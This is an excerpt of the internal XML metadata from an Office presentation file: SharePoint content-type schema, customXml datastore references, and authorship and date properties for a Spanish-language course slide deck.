      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37b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6804638235E04A8340AFEA8AA3D0E9" ma:contentTypeVersion="16" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="431fd91d37a779fe06bfe764accb67a5">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="997c87f1-bf2b-4103-84c0-26f1c6fed8b2" xmlns:ns3="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37be" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="8593362854081fba2f404972ddc45d7c" ns2:_="" ns3:_="">
    <xsd:import namespace="997c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <xsd:import namespace="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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_Flow_SignoffStatu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c87f1-bf2b-4103-84c0-26f1c6fed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dfa4cb6-0ef6-46f9-a59d-2ff317cce1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f8a9b-f9c9-464f-a560-5d0dfeaf37b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2361b79-10be-423a-9b5b-ca67978814fb}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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6DAD30-71C1-4A54-8A40-378DBB1DF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8028F9-AA23-4355-8BF6-CA440F3C7E08}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="997c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <ds:schemaRef ds:uri="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37be"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F04A6F5B-CBA5-4A38-BF3D-E965E1D4C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7c87f1-bf2b-4103-84c0-26f1c6fed8b2"/>
    <ds:schemaRef ds:uri="cfdf8a9b-f9c9-464f-a560-5d0dfeaf37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Panorámica</PresentationFormat>
  <Paragraphs>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de Office</vt:lpstr>
      <vt:lpstr>Nombre del Curso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Anahí Cespedes</dc:creator>
  <cp:lastModifiedBy>Anahí Cespedes</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-26T20:11:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-26T20:28:22Z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0x010100D16804638235E04A8340AFEA8AA3D0E9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>